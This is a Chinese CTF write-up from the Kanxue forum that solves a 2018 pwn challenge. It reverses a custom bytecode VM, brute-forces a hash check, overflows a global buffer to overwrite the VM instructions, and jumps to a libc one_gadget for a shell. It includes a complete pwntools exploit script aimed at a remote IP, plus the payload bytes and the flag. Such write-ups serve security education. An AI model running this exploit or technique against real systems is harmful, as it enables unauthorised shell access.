-
-
[原创]看雪.京东 2018CTF-第六题分析
-
发表于: 2018-6-27 11:22
-
整个程序分下面几个过程
1、爆破hash,过掉第一次验证。
2、从终端读取malloc数据时,读取大小是输入的size-1,当size=0,可读取0xFF大小的数据。产生溢出。
3、有一段自定义的指令数据,可被上面读到的数据覆盖。
4、通过分析自定义执行指令格式,构造指令代码片段,替换原始代码片段,拿到shell。
代码中还有个alarm(60)过了时间,程序就会自动终止,要求爆破的时间必须在1分钟内。
一、查看下程序安全属性
Arch: amd64-64-littleRELRO: Full RELROStack: Canary foundNX: NX enabledPIE: PIE enabled可以看出保护基本上全开了。二、使用one_gadget获取拿到shell地址
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints:rax == NULL0x4526a execve("/bin/sh", rsp+0x30, environ)constraints:[rsp+0x30] == NULL0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints:[rsp+0x50] == NULL0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints:[rsp+0x70] == NULLcall_execve = 0x4526a;初步选取0x4526a地址为 getShell_offset地址。([esp+0x30]必须为0)
三、初始化函数 sub_CB5
IDA载入后发现存在初始化数组,有2个函数sub_C80和sub_CB5,其中 sub_C80没干啥, sub_CB5函数功能如下:
1、使用随机数对sub_15E4等函数地址进行异或,并存储在全局变量中。异或是为了混淆,存储在全局变量是为了简洁的自定义指令引擎使用的。
sub_15E4 函数-----------------申请空间(输入申请大小,输入存储的内容)。
sub_16AD函数-----------------显示malloc的内容(实际没有)。
loc_1478指针 ----------------- 为自定义指令引擎使用,当用户执行完一个操作时,回到选择操作位置。
loc_1107指针 ----------------- 自定义指令引擎起始位置,用于混淆跳转和偏移计算。
2、下面两条指令是给自定义的指令数据初始化,主要的作用是根据用户输入跳转到相应的处理函数中。
qword_203140 = 0x106040F01130301LL;
qword_203148 = 0x4000161302011409LL;
unsigned__int64sub_CB5(){signedinti;// [rsp+8h] [rbp-28h]intfd;// [rsp+Ch] [rbp-24h]unsigned__int64v3;// [rsp+28h] [rbp-8h]v3 = __readfsqword(0x28u);fd = open("/dev/urandom", 0);for( i = 0; i <= 4; ++i )read(fd, (char*)qword_2030C0 - 64LL - 8 * i, 8uLL);unk_2030A8 = unk_203080 ^ (unsigned__int64)sub_15E4;unk_2030A0 = unk_203078 ^ (unsigned__int64)sub_16AD;unk_203098 = unk_203070 ^ (unsigned__int64)sub_1728;unk_203090 = unk_203068 ^ (unsigned__int64)&loc_1478;unk_203088 = unk_203060 ^ (unsigned__int64)&loc_1107;qword_203140 = 0x106040F01130301LL;qword_203148 = 0x4000161302011409LL;dword_203150 = 0;word_203154 = 0;byte_203156 = 0;close(fd);return__readfsqword(0x28u) ^ v3;}四、main函数其中sub_E87用于屏幕输出,sub_F0C函数用于hash验证,sub_1470函数是用于内存申请、显示、释放等操作。五、过hash验证先产生一个4字节的随机数,然后通过计算获得8个字节数据s,再算其hash,并将hash值打印输出,需要通过hash获得s,输入s,可通过验证。随机数产生时,每个字节x存在如下条件: 0x30 <= x < 0x5B,可爆破过验证。具体脚本如下:
def getkey(target):a = 0x30303030#a = 0x3c3b4e4bwhile(a <= 0x5A5A5A5A) :s1 = (0x343FD * a + 0x269EC3)&0xffffffffs2 = (0x343FD * s1 + 0x269EC3)&0xffffffffs = (s2<<32) + s1hash = 0i = 0;temp = swhile(i < 8):hash = ((hash*0x83) + (temp&0xff))&0xfffffffftemp = temp >> 8i=i+1if(target == hash):'find ok'returnsif((a & 0xff) < 0x5A):a=a+1continuea = (a & 0xffffff00) + 0x30;temp = (a & 0xff00) >> 8if(temp < 0x5A):a = a + 0x0100continuea = (a & 0xffff00ff) + 0x3000temp = (a & 0xff0000) >> 16if(temp < 0x5A) :a = a + 0x010000continuea = (a & 0xff00ffff) + 0x300000;a = a + 0x01000000;return0六、操作函数sub_14701、代码混淆函数sub_1470通过jmp eax形式进行混淆,eax的实际位置是0x1107,可以手动将jmp eax改成 jmp 1107,但更改后会将下面指令覆盖,可在0x14E5位置更改,让其跳转到10EF位置,将0x14E5的指令" sub rsp, 88h"挪到 10EF位置。还原后代码如下:
void*__ptr32 *sub_1470(){void*__ptr32 *result;// rax__int64v1;// ST08_8__int64v2;// ST00_8__int64v3;// [rsp+58h] [rbp-20h]__int64v4;// [rsp+60h] [rbp-18h]unsignedintv5;// [rsp+74h] [rbp-4h]sub_1591();v5 = sub_1547();result = (void*__ptr32 *)v5;if( v5 ){result = (void*__ptr32 *)v5;if( v5 <= 3 ){v1 = qword_2030C0[~((unsigned__int8)v5 - 1LL) - 7] ^ qword_2030C0[~((unsigned__int8)v5 - 1LL) - 2];v4 = qword_2030C0[-11] ^ qword_2030C0[-6];v2 = qword_2030C0[-7] ^ qword_2030C0[-12];result = sub_10FE((__int64)&v3);}}returnresult;}void*__ptr32 *__usercall sub_10FE@<rax>(__int64a1@<rbp>){__int64v1;// rt1void*__ptr32 *result;// raxsigned__int64v3;// rax*(_QWORD *)(a1 - 64) = 0LL;*(_QWORD *)(a1 - 16) = 0LL;*(_QWORD *)(a1 - 48) = 0LL;*(_QWORD *)(a1 - 8) = 0LL;*(_QWORD *)(a1 - 40) = 0LL;*(_QWORD *)(a1 - 56) = 0LL;*(_QWORD *)(a1 - 32) = 0LL;*(_QWORD *)(a1 - 24) = 0LL;while( 1 ){// qword_203140 = 0x106040F01130301LL;// qword_203148 = 0x4000161302011409LL;*(_QWORD *)(a1 - 0x10) = *((char*)&qword_203140 + *(_QWORD *)(a1 - 0x40));v1 = *(_QWORD *)(a1 - 0x10);result = off_1A1C;switch( a1 ){case1LL:*(_QWORD *)(a1 - 0x30) = *((unsigned__int8*)&qword_203140 + *(_QWORD *)(a1 - 0x40) + 1);*(_QWORD *)(a1 - 0x40) += 2LL;break;case2LL:*(_QWORD *)(a1 - 0x28) = *((unsigned__int8*)&qword_203140 + *(_QWORD *)(a1 - 0x30));++*(_QWORD *)(a1 - 0x40);break;case3LL:*(_QWORD *)(a1 - 0x38) = *(__int64*)((char*)&qword_203140 + *(_QWORD *)(a1 - 0x30));++*(_QWORD *)(a1 - 0x40);break;case4LL:*(_QWORD *)(a1 - 0x20) = *(__int64*)((char*)&qword_203140 + *(_QWORD *)(a1 - 0x30));++*(_QWORD *)(a1 - 0x40);break;case5LL:*(_QWORD *)(a1 - 0x38) -= *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 64);break;case6LL:*(_QWORD *)(a1 - 0x38) += *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 64);break;case7LL:*(_QWORD *)(a1 - 0x38) *= *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 0x40);break;case8LL:*(_QWORD *)(a1 - 0x38) /= *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 0x40);break;case9LL:*(_QWORD *)(a1 - 0x38) ^= *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 0x40);break;case10LL:*(_QWORD *)(a1 - 0x38) &= *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 64);break;case11LL:*(_QWORD *)(a1 - 0x38) |= *(_QWORD *)(a1 - 32);++*(_QWORD *)(a1 - 64);break;case12LL:*(_QWORD *)(a1 - 0x18) = *(_QWORD *)(a1 - 0x38) != *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 64);break;case13LL:if( *(_QWORD *)(a1 - 0x18) )v3 = *(_QWORD *)(a1 - 0x40) + 2LL;elsev3 = *((unsigned__int8*)&qword_203140 + *(_QWORD *)(a1 - 0x40));*(_QWORD *)(a1 - 0x40) = v3;break;case14LL:*(_QWORD *)(a1 - 0x38) = *(_QWORD *)(a1 - 0x28);++*(_QWORD *)(a1 - 64);break;case15LL:*(_QWORD *)(a1 - 0x20) = *(_QWORD *)(a1 - 0x28);++*(_QWORD *)(a1 - 64);break;case16LL:*(_QWORD *)(a1 - 0x28) = *(_QWORD *)(a1 - 0x38);++*(_QWORD *)(a1 - 64);break;case17LL:*(_QWORD *)(a1 - 0x28) = *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 64);break;case18LL:*(_QWORD *)(a1 - 0x38) = *(_QWORD *)(a1 - 0x20);++*(_QWORD *)(a1 - 0x40);break;case19LL:*(_QWORD *)(a1 - 0x38) = *(_QWORD *)(-8LL * *(_QWORD *)(a1 - 0x30) + a1 - 0x40);++*(_QWORD *)(a1 - 0x40);break;case20LL:*(_QWORD *)(a1 - 0x40 - 8LL * *(_QWORD *)(a1 - 0x30)) = *(_QWORD *)(a1 - 0x38);++*(_QWORD *)(a1 - 64);break;case21LL:++*(_QWORD *)(a1 - 0x28);++*(_QWORD *)(a1 - 0x40);break;case22LL:++*(_QWORD *)(a1 - 0x40);JUMPOUT(__CS__, *(_QWORD *)(a1 - 0x38));returnresult;default:returnresult;}}}2、自定义执行引擎分析14EF,实际上是个精简的自定义指令执行引擎,具体指令格式如下;
1)寄存器=============================================================================================================================startCodeAddr = 0x203140 自定义指令代码开始位置curOffset = rbp - 0x40 存储当前执行位置索引pc = startCodeAddr+curOffset 当前pcvarStart = rbp - 0x40 可以修改的寄存器的基址(向上修改)r0 = rbp - 0x38 通用寄存器r1 = rbp - 0x30 通用寄存器r2 = rbp - 0x28 通用寄存器r3 = rbp - 0x20 通用寄存器r4 = rbp - 0x18 通用寄存器=============================================================================================================================操作码 指令长度 含义 备注-----------------------------------------------------------------------------------------------------------------------------0x01 2 r1 = byte[pc + 1] 从代码段读取一个字节得r10x02 1 r2 = byte[startCodeAddr + r1] 从代码段[pc + r1]读取一个字节到r20x03 1 r0 = QWORD[startCodeAddr + r1] 从代码段[pc + r1]读取双字到r00x04 1 r3 = QWORD[startCodeAddr + r1] 从代码段[pc + r1]读取双字到r30x05 1 r0 = r0 - r30x06 1 r0 = r0 + r30x07 1 r0 = r0 * r30x08 1 r0 = r0 / r30x09 1 r0 = r0 ^ r30x0A 1 r0 = r0 & r30x0B 1 r0 = r0 | r30x0C 1 r4 = (r0 != r3)0x0D 1 jnz 跳转指令0x0e 1 r0 = QWORD r20x0f 1 r3 = QWORD r20x10 1 r2 = QWORD r00x11 1 r2 = QWORD r30x12 1 r0 = QWORD r30x13 1 r0 = QWORD[varStart - r1*8] 从堆栈中按照索引读取数据到r00x14 1 [varStart - r1*8] = r0 将r0的内容写到堆栈中0x15 1 r2++0x16 1 call r0 调用现实中的函数=============================================================================================================================3、自定义指令数据字节码的指令数据地址为0x203140,并且在初始化函数中赋值为:01 03 13 01 F 04 06 01 09 14 01 02 13 16 00 40 ,下面是根据上面的指令含义对其分析:
pc = 0x203140[varStart - 2*8] = 0x15E4 ;根据输入索引,选择不同处理函数,这里输入为1,15E4为申请空间处理函数01 03 r1 = byte[pc + 1] ;r1=313 r0 = [varStart - r1*8] = 0x1107 ;自定义指令执行引擎开始位置01 0F r1 = byte[pc + 1] ;r1=0F04 r3 = QWORD[0x203140+r1] ;r3 = QWORD[0x203140 + 0x0f] = 0x4006 r0 = r0 + r3 ;0x1107 + 0x40 = 0x114701 r1 = byte[pc + 1] ;r1=914 [varStart - [r1]*8] = r0 ;[varStart - 0x40] = 0x1147,构造从现实函数返回的地址01 r1 = byte[pc + 1] ;r1=213 r0 = [varStart - 2*8] = 0x15E4 ;获得要调用的现实函数地址16 call 0x15E4 ;调用申请空间出来函数00 jmp 0x1478 ;跳转主循环等待用户输入七、漏洞发现程序存在 内存申请、字符拷贝、内存释放等系统调用,但是分析一遍后,没发现太多漏洞,但是发现 sub_15E4中存在一个全局变量溢出漏洞。sub_15E4为堆申请函数,其主要流程如下:1、输入申请的size2、判断size是否大于0x80,大于则退出,否则malloc。3、从终端读取size-1个数据到全局buf_2030C0中。4、将数据从buf_2030C0拷贝到malloc地址中。5、将malloc指针和size赋给全局变量203240 和203248这里存在一个漏洞当输入的size为0时,将从终端读取0xFF大小数据到全局变量2030C0,而前面的自定义的指令数据的位置为x203140,其与2030C0相差0x80, 构造payload,并覆盖0x203140,将我们构造的自定义指令覆盖原始的指令。八、漏洞利用自定义指令存在如下指令:a) 将自定义指令数据写入到寄存器(堆栈)的指令,比如0x02\0x03\0x04相关指令b) 也存在call 寄存器(堆栈)的指令。比如 0x16指令。因此如果将执行 getShell_addr的地址放入r0中,然后使其执行0x16指令就可以直接执行如下指令,从而拿到shell。0x4526a execve("/bin/sh", rsp+0x30, environ)1、获取内存中的 getShell_addr地址
通过IDA调试,看下图
可以看到在执行字节码程序时,堆栈中存在多个libc.so库的地址,比如:libc.write+0x10的地址位于 rbp - 0x40 - 0x0d*8的位置。因此我们可以通过构造自定义指令将libc.write+0x10地址读取到通用寄存器中,由于给出了libc.so,可知write+0x10的地址为:0xF72C0,因此可以计算出: get_shell_addr_offset = 0xF72C0 - 4526a =0xB2056。可以事前将 0xB2056放到payload中,然后使用0x14指令即可以使得r0 = :get_shell_addr的真实地址。然后执行0x16指令就可以拿到shell。2、构造payload1) 将[esp+0x30] = 0。2) r0 = 内存中write+0x10的值。3) r3 = get_shell地址与 write+0x10的偏移。4) r0 = r0 - r3 = 内存 get_shell地址。5) call r0 拿到shell。覆盖原始自定义指令的数据为:'\x01\x03\x14\x01\x0D\x13\x01\x0b\x04\x05\x16\x56\x20\x0B\x00\x00\x00\x00\x00',整个pyload为:payload = 'A'*0x80 + '\x01\x03\x14\x01\x0D\x13\x01\x0b\x04\x05\x16\x56\x20\x0B\x00\x00\x00\x00\x00'下面是指令的具体说明:
//0x203140 = {01 03 14 01 0D 13 01 0B 04 05 16 56 20 0B 00 00}//初始化时,r0 = 0, pc = 0x203140r0 = 0pc = 0x203140//[esp - 0x30] = 0//[esp - 0x30] = varStart - 3*801 03 r1 = byte[0x203140 + 1] ;r1=314 [varStart - r1*8] = r0 ;[varStart - 3*8] = [esp - 0x30] = r0 (r0=0)//r0 = write_addr+0x10地址01 0d r1 = byte[pc + 1] ;r1=0d13 r0 = [varStart - r1*8] ;r0 = [varStart - 0x0d*8] = write_addr+0x10//r3 = execv_offset01 0b r1 = byte[pc + 1] ;r1=0b04 r3 = QWORD[startCodeAddr + r1] ;r3 = *(QWORD*(0x203140+0x0b)) = 0xb2016//r0 = r0 - r3 = execv_addr05 r0 = r0 + r3//get shell22 call r03、脚本如下:
#!/usr/bin/pythonfrom pwn import *#context(os='linux',arch='amd64',log_level='debug')context(os='linux',arch='amd64')print ('===============================')io = remote('139.199.99.130',8989)#io = process('./noheap')payload ='A'*0X80 +'\x01\x03\x14\x01\x0D\x13\x01\x0b\x04\x05\x16\x56\x20\x0B\x00\x00\x00\x00\x00'def getkey(target):a = 0x30303030#a = 0x3c3b4e4bwhile(a <= 0x5A5A5A5A) :s1 = (0x343FD * a + 0x269EC3)&0xffffffffs2 = (0x343FD * s1 + 0x269EC3)&0xffffffffs = (s2<<32) + s1hash = 0i = 0;temp = swhile(i < 8):hash = ((hash*0x83) + (temp&0xff))&0xfffffffftemp = temp >> 8i=i+1if(target == hash):'find ok'returnsif((a & 0xff) < 0x5A):a=a+1continuea = (a & 0xffffff00) + 0x30;temp = (a & 0xff00) >> 8if(temp < 0x5A):a = a + 0x0100continuea = (a & 0xffff00ff) + 0x3000temp = (a & 0xff0000) >> 16if(temp < 0x5A) :a = a + 0x010000continuea = (a & 0xff00ffff) + 0x300000;a = a + 0x01000000;return0inputString = io.recvuntil('Input')#get hash from screenhashStart = inputString.find('Hash:')hashStart = hashStart+5hashEnd = inputString.find('\n', hashStart)aimhash = inputString[hashStart:hashEnd]target =int(aimhash, 16)#get inputkey by hash"get hash, waiting!"value = getkey(target)print str(hex(value))'put inputkey to server'inputkeyPayload = p64(value)sleep(1)io.write(inputkeyPayload)'select 1 for malloc'io.recvuntil('Exit')sleep(1)io.write('1')sleep(1)'put 0 for malloc size,real can write 0xFF data to server'io.recvuntil('Size')sleep(1)io.write('0')'put payload data is saved at 0x2030C0'io.recvuntil('Content')sleep(1)io.write(payload)sleep(1)'put 1 ,but pc will go to execv'io.recvuntil('Exit')sleep(2)io.write('1')io.interactive()九、flagflag{4be6c278519a61e0176463bbd17a235a3}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2018-6-29 15:45
被oooAooo编辑
,原因:
|
|
|---|---|
